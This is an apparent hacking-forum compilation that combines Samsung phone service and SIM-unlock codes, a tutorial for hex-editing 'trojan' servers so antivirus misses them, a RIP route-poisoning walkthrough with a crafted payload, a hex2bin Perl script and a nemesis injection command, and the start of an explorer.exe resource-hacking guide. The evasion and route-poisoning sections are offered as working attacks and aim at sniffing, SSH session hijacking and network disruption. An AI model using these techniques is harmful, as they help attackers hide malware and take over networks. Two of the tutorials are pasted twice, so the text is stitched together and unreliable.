Samsung Secret Codes Part 3
*2767*49927# = Germany WAP Settings
*2767*44927# = UK WAP Settings
*2767*31927# = Netherlands WAP Settings
*2767*420927# = Czech WAP Settings
*2767*43927# = Austria WAP Settings
*2767*39927# = Italy WAP Settings
*2767*33927# = France WAP Settings
*2767*351927# = Portugal WAP Settings
*2767*34927# = Spain WAP Settings
*2767*46927# = Sweden WAP Settings
*2767*380927# = Ukraine WAP Settings
*2767*7927# = Russia WAP Settings
*2767*30927# = GREECE WAP Settings
*2767*73738927# = WAP Settings Reset
*2767*49667# = Germany MMS Settings
*2767*44667# = UK MMS Settings
*2767*31667# = Netherlands MMS Settings
*2767*420667# = Czech MMS Settings
*2767*43667# = Austria MMS Settings
*2767*39667# = Italy MMS Settings
*2767*33667# = France MMS Settings
*2767*351667# = Portugal MMS Settings
*2767*34667# = Spain MMS Settings
*2767*46667# = Sweden MMS Settings
*2767*380667# = Ukraine MMS Settings
*2767*7667#. = Russia MMS Settings
*2767*30667# = GREECE MMS Settings
*#7465625# = Check the phone lock status
*7465625*638*Code# = Enables Network lock
#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*27*Code# = Disables CP lock
*7465625*746*Code# = Enables SIM lock
#7465625*746*Code# = Disables SIM lock
*7465625*228# = Activa lock ON
#7465625*228# = Activa lock OFF
*7465625*28638# = Auto Network lock ON
#7465625*28638# = Auto Network lock OFF
*7465625*28782# = Auto subset lock ON
#7465625*28782# = Auto subset lock OFF
*7465625*2877# = Auto SP lock ON
#7465625*2877# = Auto SP lock OFF
*7465625*2827# = Auto CP lock ON
#7465625*2827# = Auto CP lock OFF
*7465625*28746# = Auto SIM lock ON
#7465625*28746# = Auto SIM lock OFF
Type *#9998*627837793# Go to the 'my parameters' and there you will find new menu where you can unlock phone.(not tested-for samsung C100)
To unlock a Samsung turn the phone off take the sim card and type the following code *#pw+15853649247w# .
Java status code: #*53696# (Samsung X600)
If you want to unlock your phone put a sim from another company then type *#9998*3323# it will reset your phone. Push exit and then push 7, it will reset again. Put your other sim in and it will say sim lock, type in 00000000 then it should be unlocked. Type in *0141# then the green call batton and it's unlocked to all networks. This code may not work on the older phones and some of the newer phones. If it doesn't work you will have to reset your phone without a sim in it by typing *#2767*2878# or *#9998*3855# (not tested)
*2767*688# = Unlocking Code
*#8999*8378# = All in one Code
*#4777*8665# = GPSR Tool
*#8999*523# = LCD Brightness
*#8999*3825523# = External Display
*#8999*377# = Errors
#*5737425# = JAVA Something{I choose 2 and it chrashed}][/b]
*#2255# = Call List
#*536961# = Java Status Code
#*536962# = Java Status Code
#*536963# = Java Status Code
#*53696# = Java Status Code
#*1200# = AFC DAC Val
#*1300# = IMEI
#*1400# = IMSI
#*2562# = ??? White for 15 secs than restarts.
#*2565# = Check Blocking
#*3353# = Check Code
#*3837# = ??? White for 15 secs than restarts.
#*3849# = ??? White for 15 secs than restarts.
#*3851# = ??? White for 15 secs than restarts.
#*3876# = ??? White for 15 secs than restarts.
#*7222# = Operation Typ (Class C GSM)
#*7224# = I Got !! ERROR !!
#*7252# = Oparation Typ (Class B GPRS)
#*7271# = Multi Slot (Class 1 GPRS)
#*7274# = Multi Slot (Class 4 GPRS)
#*7276# = Dunno
#*7337# = EEPROM Reset (Unlock and Resets WAP Settings)
#*2787# = CRTP ON/OFF
#*3737# = L1 Dbg data
#*5133# = L1 Dbg data
#*7288# = GPRS Attached
#*7287# = GPRS Detached
#*7666# = SrCell Data
#*7693# = Sleep Act/DeAct (Enable or Disable the Black screen after doing nothing for a while)
#*7284# = Class : B,C or GPRS
#*2256# = Calibration Info
#*2286# = Battery Data
#*2527# = GPRS Switching (set to: class 4, class 8, class 9 or class 10)
#*2679# = Copycat feature (Activate or Deactivate)
#*3940# = External loop test 9600 bps
#*4263# = Handsfree mode (Activate or Deactivate)
#*4700# = Half Rate (Activate or Deactivate)
#*7352# = BVMC Reg value
#*8462# = Sleeptime
#*2558# = Time ON
#*3370# = EFR (Activate or Deactivate)
#*3941# = External looptest 115200 bps
#*5176# = L1 Sleep
#*7462# = SIM phase
#*7983# = Voltage/Frequenci (Activate or Deactivate)
#*7986# = Voltage (Activate or Deactivate)
#*8466# = Old time
#*2255# = Call ???
#*5187# = L1C2G trace (Activate or Deactivate)
#*5376# = ??? White for 15 secs than restarts.
#*6837# = Official Software Version
#*7524# = KCGPRS
#*7562# = LOCI GPRS
#*7638# = RLC allways open ended TBF (Activate or Deactivate)
#*7632# = Sleep mode Debug
#*7673# = Sleep mode RESET
#*2337# = Permanent Registration Beep
#*2474# = ???
#*2834# = Audio Path
#*3270# = DCS support (Activate or Deactivate)
#*3282# = Data (Activate or Deactivate)
#*3476# = EGSM (Activate or Deactivate)
#*3676# = Flash volume formated
#*4760# = GSM (Activate or Deactivate)
#*4864# = Dunno doesn't work on newer versions
#*5171# = L1P1
#*5172# = L1P2
#*5173# = L1P3
#*7326# = Accessory (I got Vibrator)
#*7683# = Sleep variable (
#*7762# = SMS Brearer CS (Activate or Deactivate)
#*8465# = Time in L1
#*9795# = wtls key
#*2252# = Current CAL
#*2836# = AVDDSS Management (Activate or Deactivate)
#*3877# = Dump of SPY trace
#*7728# = RSAV done# (Everything went to standart but nothing was deleted)
#*2677# = ARM State (None or Full Rate)
*#8999*636# = Have no clue what it is, i see 20 lines
*#9999# = Software version
*#8999*8376263# = HW ver, SW ver and Build Date
*#8888# = HW version
*#8377466# = Same HW/SW version thing
*#7465625# = Check the locks
*7465625*638*Code# = Enables Network lock
#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*638*Code# = Disables Network lock
*7465625*782*Code# = Enables Subset lock
#7465625*782*Code# = Disables Subset lock
*7465625*77*Code# = Enables SP lock
#7465625*77*Code# = Disables SP lock
*7465625*27*Code# = Enables CP lock
#7465625*27*Code# = Disables CP lock
*7465625*746*Code# = Enables SIM lock
#7465625*746*Code# = Disables SIM lock
*7465625*228# = Activa lock ON
#7465625*228# = Activa lock OFF
*7465625*28638# = Auto Network lock ON
#7465625*28638# = Auto Network lock OFF
*7465625*28782# = Auto subset lock ON
#7465625*28782# = Auto subset lock OFF
*7465625*2877# = Auto SP lock ON
#7465625*2877# = Auto SP lock OFF
*7465625*2827# = Auto CP lock ON
#7465625*2827# = Auto CP lock OFF
*7465625*28746# = Auto SIM lock ON
#7465625*28746# = Auto SIM lock OFF
*2767*3855# = E2P Full Reset
*2767*2878# = E2P Custom Reset
*2767*927# = E2P WAP Reset
*2767*226372# = E2P Camera Reset
#*6420# = MIC Off
#*6421# = MIC On
#*6422# = MIC Data
#*6428# = MIC Measurement
#*3230# = Trace enable and DCD disable
#*3231# = Trace disable and DCD enable
#*3232# = Current Mode
#7263867# = RAM Dump (On or Off)
*2767*49927# = Germany WAP Settings
*2767*44927# = UK WAP Settings
*2767*31927# = Netherlands WAP Settings
*2767*420927# = Czech WAP Settings
*2767*43927# = Austria WAP Settings
*2767*39927# = Italy WAP Settings
*2767*33927# = France WAP Settings
*2767*351927# = Portugal WAP Settings
*2767*34927# = Spain WAP Settings
*2767*46927# = Sweden WAP Settings
*2767*380927# = Ukraine WAP Settings
*2767*7927# = Russia WAP Settings
*2767*30927# = GREECE WAP Settings
*2767*73738927# = WAP Settings Reset
*2767*49667# = Germany MMS Settings
*2767*44667# = UK MMS Settings
*2767*31667# = Netherlands MMS Settings
*2767*420667# = Czech MMS Settings
*2767*43667# = Austria MMS Settings
*2767*39667# = Italy MMS Settings
*2767*33667# = France MMS Settings
*2767*351667# = Portugal MMS Settings
*2767*34667# = Spain MMS Settings
*2767*46667# = Sweden MMS Settings
*2767*380667# = Ukraine MMS Settings
*2767*7667#. = Russia MMS Settings
*2767*30667# = GREECE MMS Settings
*335# = Delete all MMS Messages
*663867# = Dump Mm file
#*536961# = WAPSAR enable / HTTP disable
#*536962# = WAPSAR disable / HTTP enable
#*536963# = Serial eable / Others disable
#*53696# = Java Download Mode
#*5663351# = WAP Model ID [Your Model]
#*5663352# = WAP Model ID [SEC-SGHXXXX/1.0]
#*566335# = WAP Model ID [SEC-SGHXXXX/1.0]
*2767*66335# = Check on which model it is
*2767*7100# = SEC-SGHS100/1.0
*2767*8200# = SEC-SGHV200/1.0
*2767*7300# = SEC-SGHS300/1.0
*2767*7650# = Nokia7650/1.0
*2767*2877368# = Reset WAP Model ID to standart
--------------------
Hexing for beginners.
Goal: To learn how to hex edit "trojans" or anything else making them UD to AV programs.
Definitions:
UD: Undetected
AV: Anti-Virus
FW: FireWall
*Make sure the program which you are reading this in has WORD WRAP *ON*
*And the word *Click* in the tutorial is written that way so you can easily scim through the tutorial if you would like.
_________________________________
To begin, HexEditing is a difficult and partially effective method used to make "trojans" UD. In some cases this method will not work because the AV has tagged a vital part of the code. There are a few necessities you will need:
Hex Workshop or another HexProgram (Hex Workshop is used in this tutorial)
: Download Link
http://www.download.com/3000-2352-10004918...&tag=button
:Your Server is needed (this is what you are hexing)
:A little time and a good attitude (alwayz good) : )
__________________________________
Ok lets begin...
1) First open up "Hex Workshop" and *Click* File:Open: Find your server or whatever you are hexing and *Click* it and then *Click* open.
2) In you workfield all the HexValues should pop-up. Get familiar with the file look at certain bytes this will help you understand more.
3) Scroll down to about the middle and *Click* the first offsett on the left side. Grab it and drag down as you drag down do NOT let go or you will have to return and do it again. Keep holding it down until your at the bottom of the file Offsett 1.
4) Seeing half the file highlighted. Right *Click* and *Click* Fill. A new window should open, in the textbox instead of 0 put 00. Then *Click* Ok.
5) What you have just done is cut the file in half. The 00 byte has no values at all, another common used byte used in hexing is 90 it is the no-operation byte.
6) Ok now you have half the file filled with 00's right? Good... Point your arrow to the left hand corner. *Click* File: Save As. Save the file 1.exe. Be sure to remember the offsett you cut the file at.
7) Go to the directory you saved 1.exe in, and right *Click* it and find a tab called Scan It For Viruses with your AV logo beside it. Once its done scanning if it is detected that means the detected string is not in that half which you filled with 00's.
_How an AV detects Malware_
An AV program is very powerfull it stops about 98% of common malware from infecting your PC. Our goal like said earlier is to be apart of that 2%. An AV when it scans a file looks for a string it could be anywhere in the file. Most likely it is in the most vulnerable spot, via if you arn't carefull you could corrupt your server. The detected string is a digital string that is in the database of the AV. Have you ever seen your AV connect to the internet and look for updates? This is your AV downloading new strings that it will later use to defend your computer against malware. That is how a common AV works!
Cool Ok lets move on once again, right now you should have your original server, and the detected half of your server (1.exe). Now in HexWorkshop open up your Original Server. Why we are doing this is, because the AV when it detected (1.exe) it deleted all the bytes. So now find the offsett in the middle which you started at, and pull it down or up again, but this time do not go all they way (cutting it in half). Bring it down or up about 5-10,000 offsetts from the middle point. Fill the highlighted area with 00's. Then save the file as Scan.exe, also save it as scanbackup.exe.
FootNote: The names are examples you may name them whatever you like just remember them. Also me personally i record all the offsetts i stop and start at in notepad.
9) Now in the directory you saved Scan.exe right click it and Scan it for viruses once more. If it is still detected then you have not found the offsett yet.
How you know when you find it?
You know that you have found the offsett when your AV no longer detects the file. Be sure to remember that if your AV detects the file you scanned it will delete the whole file. This is why you should always keep a backup.
10) Ok by now you should get the jist of how to find the detected string. Most AV's detect 2-3 strings sometimes though it could be as little as 2 bytes or as large as 10 strings. Continue until you find the detected strings.....
11) Ahh yes you have found them. Congratulations!!! Now your not through quite yet, just a little more to go. You have located the detected strings now you must edit them ever so slightly to make the file UD and the server to still work. Change the numbers around using the fill option explained earlier to do this. If you do it just right and things aren't to different you will have successfully HexEdited.
________________________
Definitions:
UD: Undetected
AV: Anti-Virus
FW: FireWall
*Make sure the program which you are reading this in has WORD WRAP *ON*
*And the word *Click* in the tutorial is written that way so you can easily scim through the tutorial if you would like.
_________________________________
To begin, HexEditing is a difficult and partially effective method used to make "trojans" UD. In some cases this method will not work because the AV has tagged a vital part of the code. There are a few necessities you will need:
Hex Workshop or another HexProgram (Hex Workshop is used in this tutorial)
: Download Link
http://www.download.com/3000-2352-10004918...&tag=button
:Your Server is needed (this is what you are hexing)
:A little time and a good attitude (alwayz good) : )
__________________________________
Ok lets begin...
1) First open up "Hex Workshop" and *Click* File:Open: Find your server or whatever you are hexing and *Click* it and then *Click* open.
2) In you workfield all the HexValues should pop-up. Get familiar with the file look at certain bytes this will help you understand more.
3) Scroll down to about the middle and *Click* the first offsett on the left side. Grab it and drag down as you drag down do NOT let go or you will have to return and do it again. Keep holding it down until your at the bottom of the file Offsett 1.
4) Seeing half the file highlighted. Right *Click* and *Click* Fill. A new window should open, in the textbox instead of 0 put 00. Then *Click* Ok.
5) What you have just done is cut the file in half. The 00 byte has no values at all, another common used byte used in hexing is 90 it is the no-operation byte.
6) Ok now you have half the file filled with 00's right? Good... Point your arrow to the left hand corner. *Click* File: Save As. Save the file 1.exe. Be sure to remember the offsett you cut the file at.
7) Go to the directory you saved 1.exe in, and right *Click* it and find a tab called Scan It For Viruses with your AV logo beside it. Once its done scanning if it is detected that means the detected string is not in that half which you filled with 00's.
_How an AV detects Malware_
An AV program is very powerfull it stops about 98% of common malware from infecting your PC. Our goal like said earlier is to be apart of that 2%. An AV when it scans a file looks for a string it could be anywhere in the file. Most likely it is in the most vulnerable spot, via if you arn't carefull you could corrupt your server. The detected string is a digital string that is in the database of the AV. Have you ever seen your AV connect to the internet and look for updates? This is your AV downloading new strings that it will later use to defend your computer against malware. That is how a common AV works!
Cool Ok lets move on once again, right now you should have your original server, and the detected half of your server (1.exe). Now in HexWorkshop open up your Original Server. Why we are doing this is, because the AV when it detected (1.exe) it deleted all the bytes. So now find the offsett in the middle which you started at, and pull it down or up again, but this time do not go all they way (cutting it in half). Bring it down or up about 5-10,000 offsetts from the middle point. Fill the highlighted area with 00's. Then save the file as Scan.exe, also save it as scanbackup.exe.
FootNote: The names are examples you may name them whatever you like just remember them. Also me personally i record all the offsetts i stop and start at in notepad.
9) Now in the directory you saved Scan.exe right click it and Scan it for viruses once more. If it is still detected then you have not found the offsett yet.
How you know when you find it?
You know that you have found the offsett when your AV no longer detects the file. Be sure to remember that if your AV detects the file you scanned it will delete the whole file. This is why you should always keep a backup.
10) Ok by now you should get the jist of how to find the detected string. Most AV's detect 2-3 strings sometimes though it could be as little as 2 bytes or as large as 10 strings. Continue until you find the detected strings.....
11) Ahh yes you have found them. Congratulations!!! Now your not through quite yet, just a little more to go. You have located the detected strings now you must edit them ever so slightly to make the file UD and the server to still work. Change the numbers around using the fill option explained earlier to do this. If you do it just right and things aren't to different you will have successfully HexEdited.
________________________
Crafting Routing protocols using Nemesis
This tutorial shows how to use nemesis to craft a UDP packet and custom payload then deliver it to a router running RIP. This enables us to perform the following attacks:
1/ This allows us to propogate a bogus route into the routing environment . We can then attack from an IP block that has not yet been allocated or a subnet that is in use by another company but has not yet been allocated. (IP spoofing)
2/ We can place ourselves in the routing path of all network traffic. This allows the sniffing of traffic that normally you’d have to be on the same broadcast domain as the victim to sniff.
3/ It also can enable us to TCP session hijack our victim and take over an SSH session of the victim after they have authenticated with the server.
4/ We can disrupt all network traffic by telling all traffic to go to an unreachable destination, or add loops into the routing topology.
The basis of this tutorial is to show you how to craft a RIP packet which will convey a RIP update to a node running RIP. You will also notice it would be straightforward to use this tutorial as a basis for crafting other protocols such as DNS, OSPF, IGRP, and EIGRP.
Choose your Weapons
Here we are going to be using the following tools.
* Nemesis - Nemesis is a portable IP stack that we will use to inject our payload. Nemesis will write *anything* into the packet so we need to know what we are doing and study the packet we are going to craft's structure and what router's will expect the packet to contain.
Otherwise we will just create malformed packets, which will be dropped by the receiving device. You'd do well to read the relevant RFC's and TCP/IP illustrated before attempting to craft your own.
* Ethereal - I've said enough already. We need it to make sure our packets are well formed when we send them, also it's very useful to analyse other packets we may want to craft and use as a basis for a nemesis payload. Also if we send a request to another router for it's routing table we need it to sniff the reply. Enumeration of the targete environment is key to this attack.
*B4rtm4n's perl script - You won't get too far with it. This converts our hex code into binary.Our payload file that will be used by Nemesis must be in binary or we'll simply write rubbish into our packet. This is our magic ingredient.
What is RIP?
RIP is an interior gateway protocol that is mature, stable, and is widely supported by many manufacturers. It is also easy to configure. Therefore, it is suitable for use in stub networks, and small AS's (autonomous systems) that do not have many redundant paths. Having too many redundant paths would warrant a more sophisticated routing protocol. RIP is broadcast based, and uses UDP as it’s transport protocol, and by default will listen on port 520. There are two versions of RIP; RIP v1 (RFC 1388) and RIP v2 (RFC 1723).
RIP is also a distance vector routing protocol. What that means is it can be prone to routing loops. Which are controlled via hold down timers, and split horizon processing.
RIP sends routing table updates at regular intervals (every 30 seconds), and when there is a change to the routing topology. It also marks routes, as invalid when it doesn’t receive regular updates for them.
When a router receives an update it in turn updates it's own routing table. The RIP enabled router then increases the route metric by one, and adds the sender as the next hop destination.
RIP maintains only the routes with the lowest metrics to a destination. A metric of greater than 15 is considered infinite and therefore unreachable. RIP security mechanisms consist of configuring the router to only accept routes from neighbouring routers.(easily spoofed as the transport is UDP). Lastly there is also plaintext password authentication.
RIP Packet structure
In order to get the ascii payload correct for the binary file we need to understand the RIP version 2 structure to get meaningful results. This is taken directly from RFC 1723 with a few of my own notes for clarity and brevity.
The first four octets of a RIP message contain the RIP header. The remainder of the message is composed of 1 - 25 route entries (20 octets each). The new RIP message format is:
0 1 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Command (1) | Version (1) | unused |
+---------------+---------------+-------------------------------+
| Address Family Identifier (2) | Route Tag (2) |
+-------------------------------+-------------------------------+
| IP Address (4) |
+---------------------------------------------------------------+
| Subnet Mask (4) |
+---------------------------------------------------------------+
| Next Hop (4) |
+---------------------------------------------------------------+
| Metric (4) |
+---------------------------------------------------------------+
The Command, Address Family Identifier (AFI), IP Address, and Metric all have the meanings defined in RFC 1058. The Version field will specify version number 2 for RIP messages which use authentication or carry information in any of the newly defined fields. The contents of the unused field (two octets) shall be ignored.
Command field lets the router know what it has to do with the packet.
Valid values are 1 or 2.
1 is a rip request , this tells the router to send me all the routes it currently knows. (useful for evaluating what routes you might need to change)
2 is a RIP update. This tells the router what routes to add to it's routing table
Version field - says whether or not it's rip version 1 or 2.
Unused - as it says we don't use this field and set it to 0
Address family identifier - only IP is supported therefore the value must be 2 (IP)
Route tag - The RIP route may be propogated further by other routers using other protocols such as, OSPF. If we could learn this from the network we are attacking our route may be propogated further by other routers. Otherwise set it to 0.
IP Address - IP address of the router propogating the route. As the transport for this is UDP you can pretend to have an IP other than your true IP as no session is setup between yourself and the victim as TCP would. This means you can pretend to be a trusted neighbouring router.
Subnet mask for the route you wish to propogate.
Next hop - The IP of the router you want the traffic to go to (yourself if you intend to sniff or session hijack the traffic, you could also create a routing loop or blackhole route is you wished though)
Metric - The cost of the route. 1 means directly connected , 16 is unreachable, over 16 and the packet will be dropped outright. By adjusting the metric we can add new , seemingly better, routes of our choosing or kill routes learned from other routers.
A captured RIP v2 packet
Here's packet that was captured using Ethereal, we aren’t interested in anything other than the green section as that's the RIP update structure as defined by the RFC. Even though Ethereal shows this as hex it's actually on the wire in binary, This means that when we craft our payload we must write the contents of the packet in hex then convert it to binary using a script. We only need to generate the section highlighted in green as Nemesis will create the rest of our headers for us.
0000 ff ff ff ff ff ff 00 00 b4 90 aa 59 08 00 45 00 ...........Y..E.
0010 00 34 03 52 00 00 80 11 b4 e4 c0 a8 00 33 c0 a8 .4.R.........3..
0020 00 ff 02 08 02 08 00 20 6e 14 02 02 00 00 00 02 ....... n.......
0030 00 00 0a 00 00 00 ff 00 00 00 00 00 00 00 00 00 ................
0040 00 02 ..
..
Preparing our payload
What we are doing here is preparing a text file, we will then convert this from hex to binary and inject it using nemesis. This is the payload Nemesis will carry to our target.
Note that what is being prepared here is the section highlighted in green from the previous section. Also the packet being prepared is sending a different route other than the one illustrated above, but they both start 02 02 for reasons shown later.
Here's the ascii which we will convert;
020200000002000000e000000ffffff00c0a8007f00000002
02 this is our command an update a 02 (remember this is hex, to convert from bin to hex get your calc out type in the decimal and click the hex button)
02 RIP version 2
0000 two unused bytes
0002 AFI is IP (it's the only valid one)
0000 this is our route tag it needs to be 0 unless we know it will be reused by another protcol
0e000000 this is the hex for the route to propogate
ffffff00 subnet mask in hex for our route
c0a8007f router advertising the route
000000002 metric for the route
we then copy the following into a text file.
Quote:
02020000000200000e000000ffffff00c0a8007f00000002
note no spaces and 00 = 1 byte therefore my ip is c0 (192) a8 (168) 00 (0) 7f (127)
After we've put the string of ascii into our text file we then convert it using the hex2bin perl script coded by b4rtm4n.
Quote:
#!/usr/bin/perl -w
### Coded by B4rtm4n © 06/05/2005
### HEX to binary
###
###
### Convert datagram to raw ASCII
### Get input from file
#$usage="perl hex2bin.pl hex.file > bin.file\n"
$input = "";
while (<>)
{
$input=$input.$_;
#print "$input";
}
#$input = chomp ($input);
$x=length($input); #get the size of the input
$ascii=""; #ensure the string is initally null
for ($y=0; $y < $x; $y++ )
{
$z=substr($input, $y, 2);
$dec= hex ($z);
$ascii= chr ($dec);
print "$ascii";
$y++;
}
We then create our binary that will be written to the wire like so.
Quote:
MattA-at-W34p0nX /home/MattA ->perl hex2bin.pl inject > ascii.bin
We then inject the payload with nemesis
Quote:
W34p0nX# nemesis udp -P /ascii.bin -S 192.168.0.127 -D 192.168.0.1 -x 520 -y 520 -t0
UDP Packet Injected
The syntax there was
nemesis udp - use UDP as a transport
-P payload file
-S where it's coming from which can be anywhere no TCP handshake to negotiate you also might want to poison two routers to get all the traffic (there and back) going through you.
Congrats, you own the entire network.
Where to now then ?
That get you started with a simple routing protocol, it’s a little bit harder to use this same technique to route poison OSPF and EIGRP, but the results are exactly the same. You might even try some of the malformed packet exploits that some cisco routers are vulnerable to.
1/ This allows us to propogate a bogus route into the routing environment . We can then attack from an IP block that has not yet been allocated or a subnet that is in use by another company but has not yet been allocated. (IP spoofing)
2/ We can place ourselves in the routing path of all network traffic. This allows the sniffing of traffic that normally you’d have to be on the same broadcast domain as the victim to sniff.
3/ It also can enable us to TCP session hijack our victim and take over an SSH session of the victim after they have authenticated with the server.
4/ We can disrupt all network traffic by telling all traffic to go to an unreachable destination, or add loops into the routing topology.
The basis of this tutorial is to show you how to craft a RIP packet which will convey a RIP update to a node running RIP. You will also notice it would be straightforward to use this tutorial as a basis for crafting other protocols such as DNS, OSPF, IGRP, and EIGRP.
Choose your Weapons
Here we are going to be using the following tools.
* Nemesis - Nemesis is a portable IP stack that we will use to inject our payload. Nemesis will write *anything* into the packet so we need to know what we are doing and study the packet we are going to craft's structure and what router's will expect the packet to contain.
Otherwise we will just create malformed packets, which will be dropped by the receiving device. You'd do well to read the relevant RFC's and TCP/IP illustrated before attempting to craft your own.
* Ethereal - I've said enough already. We need it to make sure our packets are well formed when we send them, also it's very useful to analyse other packets we may want to craft and use as a basis for a nemesis payload. Also if we send a request to another router for it's routing table we need it to sniff the reply. Enumeration of the targete environment is key to this attack.
*B4rtm4n's perl script - You won't get too far with it. This converts our hex code into binary.Our payload file that will be used by Nemesis must be in binary or we'll simply write rubbish into our packet. This is our magic ingredient.
What is RIP?
RIP is an interior gateway protocol that is mature, stable, and is widely supported by many manufacturers. It is also easy to configure. Therefore, it is suitable for use in stub networks, and small AS's (autonomous systems) that do not have many redundant paths. Having too many redundant paths would warrant a more sophisticated routing protocol. RIP is broadcast based, and uses UDP as it’s transport protocol, and by default will listen on port 520. There are two versions of RIP; RIP v1 (RFC 1388) and RIP v2 (RFC 1723).
RIP is also a distance vector routing protocol. What that means is it can be prone to routing loops. Which are controlled via hold down timers, and split horizon processing.
RIP sends routing table updates at regular intervals (every 30 seconds), and when there is a change to the routing topology. It also marks routes, as invalid when it doesn’t receive regular updates for them.
When a router receives an update it in turn updates it's own routing table. The RIP enabled router then increases the route metric by one, and adds the sender as the next hop destination.
RIP maintains only the routes with the lowest metrics to a destination. A metric of greater than 15 is considered infinite and therefore unreachable. RIP security mechanisms consist of configuring the router to only accept routes from neighbouring routers.(easily spoofed as the transport is UDP). Lastly there is also plaintext password authentication.
RIP Packet structure
In order to get the ascii payload correct for the binary file we need to understand the RIP version 2 structure to get meaningful results. This is taken directly from RFC 1723 with a few of my own notes for clarity and brevity.
The first four octets of a RIP message contain the RIP header. The remainder of the message is composed of 1 - 25 route entries (20 octets each). The new RIP message format is:
0 1 2 3 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Command (1) | Version (1) | unused |
+---------------+---------------+-------------------------------+
| Address Family Identifier (2) | Route Tag (2) |
+-------------------------------+-------------------------------+
| IP Address (4) |
+---------------------------------------------------------------+
| Subnet Mask (4) |
+---------------------------------------------------------------+
| Next Hop (4) |
+---------------------------------------------------------------+
| Metric (4) |
+---------------------------------------------------------------+
The Command, Address Family Identifier (AFI), IP Address, and Metric all have the meanings defined in RFC 1058. The Version field will specify version number 2 for RIP messages which use authentication or carry information in any of the newly defined fields. The contents of the unused field (two octets) shall be ignored.
Command field lets the router know what it has to do with the packet.
Valid values are 1 or 2.
1 is a rip request , this tells the router to send me all the routes it currently knows. (useful for evaluating what routes you might need to change)
2 is a RIP update. This tells the router what routes to add to it's routing table
Version field - says whether or not it's rip version 1 or 2.
Unused - as it says we don't use this field and set it to 0
Address family identifier - only IP is supported therefore the value must be 2 (IP)
Route tag - The RIP route may be propogated further by other routers using other protocols such as, OSPF. If we could learn this from the network we are attacking our route may be propogated further by other routers. Otherwise set it to 0.
IP Address - IP address of the router propogating the route. As the transport for this is UDP you can pretend to have an IP other than your true IP as no session is setup between yourself and the victim as TCP would. This means you can pretend to be a trusted neighbouring router.
Subnet mask for the route you wish to propogate.
Next hop - The IP of the router you want the traffic to go to (yourself if you intend to sniff or session hijack the traffic, you could also create a routing loop or blackhole route is you wished though)
Metric - The cost of the route. 1 means directly connected , 16 is unreachable, over 16 and the packet will be dropped outright. By adjusting the metric we can add new , seemingly better, routes of our choosing or kill routes learned from other routers.
A captured RIP v2 packet
Here's packet that was captured using Ethereal, we aren’t interested in anything other than the green section as that's the RIP update structure as defined by the RFC. Even though Ethereal shows this as hex it's actually on the wire in binary, This means that when we craft our payload we must write the contents of the packet in hex then convert it to binary using a script. We only need to generate the section highlighted in green as Nemesis will create the rest of our headers for us.
0000 ff ff ff ff ff ff 00 00 b4 90 aa 59 08 00 45 00 ...........Y..E.
0010 00 34 03 52 00 00 80 11 b4 e4 c0 a8 00 33 c0 a8 .4.R.........3..
0020 00 ff 02 08 02 08 00 20 6e 14 02 02 00 00 00 02 ....... n.......
0030 00 00 0a 00 00 00 ff 00 00 00 00 00 00 00 00 00 ................
0040 00 02 ..
..
Preparing our payload
What we are doing here is preparing a text file, we will then convert this from hex to binary and inject it using nemesis. This is the payload Nemesis will carry to our target.
Note that what is being prepared here is the section highlighted in green from the previous section. Also the packet being prepared is sending a different route other than the one illustrated above, but they both start 02 02 for reasons shown later.
Here's the ascii which we will convert;
020200000002000000e000000ffffff00c0a8007f00000002
02 this is our command an update a 02 (remember this is hex, to convert from bin to hex get your calc out type in the decimal and click the hex button)
02 RIP version 2
0000 two unused bytes
0002 AFI is IP (it's the only valid one)
0000 this is our route tag it needs to be 0 unless we know it will be reused by another protcol
0e000000 this is the hex for the route to propogate
ffffff00 subnet mask in hex for our route
c0a8007f router advertising the route
000000002 metric for the route
we then copy the following into a text file.
Quote:
02020000000200000e000000ffffff00c0a8007f00000002
note no spaces and 00 = 1 byte therefore my ip is c0 (192) a8 (168) 00 (0) 7f (127)
After we've put the string of ascii into our text file we then convert it using the hex2bin perl script coded by b4rtm4n.
Quote:
#!/usr/bin/perl -w
### Coded by B4rtm4n © 06/05/2005
### HEX to binary
###
###
### Convert datagram to raw ASCII
### Get input from file
#$usage="perl hex2bin.pl hex.file > bin.file\n"
$input = "";
while (<>)
{
$input=$input.$_;
#print "$input";
}
#$input = chomp ($input);
$x=length($input); #get the size of the input
$ascii=""; #ensure the string is initally null
for ($y=0; $y < $x; $y++ )
{
$z=substr($input, $y, 2);
$dec= hex ($z);
$ascii= chr ($dec);
print "$ascii";
$y++;
}
We then create our binary that will be written to the wire like so.
Quote:
MattA-at-W34p0nX /home/MattA ->perl hex2bin.pl inject > ascii.bin
We then inject the payload with nemesis
Quote:
W34p0nX# nemesis udp -P /ascii.bin -S 192.168.0.127 -D 192.168.0.1 -x 520 -y 520 -t0
UDP Packet Injected
The syntax there was
nemesis udp - use UDP as a transport
-P payload file
-S where it's coming from which can be anywhere no TCP handshake to negotiate you also might want to poison two routers to get all the traffic (there and back) going through you.
Congrats, you own the entire network.
Where to now then ?
That get you started with a simple routing protocol, it’s a little bit harder to use this same technique to route poison OSPF and EIGRP, but the results are exactly the same. You might even try some of the malformed packet exploits that some cisco routers are vulnerable to.
Hacking explorer.exe
Explorer.exe, the most important app in windows. I am going to should you how to hack it to how you like it, and downsizing it from 984 KB to 292 KB, keeping only necessary icons and bitmaps. Most of the hacks done here will be noticeable in the classic windows, not the one with all the graphics.
DISCLAIMER: I DON'T TAKE ANY RESPONSIBILITY FOR WHAT HAPPENS TO YOUR COMUPTER AS A RESULT OF THIS GUIDE, OR MY SCRIPT.
I wrote this guide assuming you have used ResHacker before, but will explain most of it anyway.
